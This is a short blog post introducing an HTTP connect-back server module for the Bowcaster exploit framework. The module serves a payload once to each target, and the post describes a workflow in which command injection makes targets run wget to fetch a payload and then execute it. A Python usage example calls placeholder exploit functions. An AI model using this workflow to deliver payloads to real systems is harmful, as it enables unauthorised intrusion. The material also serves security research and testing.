Wednesday, October 09, 2013

A Connect-back HTTP Exploit Server for Bowcaster

I've just added a module to Bowcaster that I think is cool. Actually, I just got around to finishing a module that was there all along. It's a basic HTTP server module, but it has some unique features that make it suitable for serving payloads to remotely exploited targets.

The connect-back server modules in Bowcaster are designed to run asynchronously so that they can be used right in line with your exploit code. Basically the model is this:
  1. Instantiate connect-back server.
  2. Call server.serve(), which returns immediately.
  3. Do other stuff, e.g., throw exploit.
  4. Call server.wait()
  5. That's it. There is no step 5.
The HTTPConnectbackServer module fits this model as well. You provide it a list of payloads to serve, and it forks into the background and serves them each exactly one time. Once all the files have been served, the server terminates.

The use case that I envisioned is a situation where you're exploiting one or more targets via command injection. Your exploit would execute the wget command on the system to fetch a payload, and then a subsequent command injection would execute the downloaded payload.

Perhaps you're even exploiting multiple targets where each target gets its own customized version of the payload. Provide a list of custom payload files and when each target has phoned home to get its payload, the server shuts down.

Using it is pretty straightforward. Here's an example:


from bowcaster.servers.http_server import HTTPConnectbackServer

files_to_serve=["payload_192.168.0.1",
                "payload_192.168.0.2",
                "payload_192.168.0.3"]



try:
    httpd=HTTPConnectbackServer("192.168.0.10",
                                 files_to_serve=files_to_serve,
                                 docroot="/www/payloads")
    httpd.serve()
except:
    #Uh oh. Couldn't start the server. 
    #Do all the payload files exist?
    sys.exit(1)

try:
    throw_exploit_1()
    throw_exploit_2()
    throw_exploit_3()
    httpd.wait()
except Exception as e:
    #something went wrong
    httpd.shutdown()

Anyway, stay tuned, because I have some other neat Bowcaster stuff in the pipeline as well.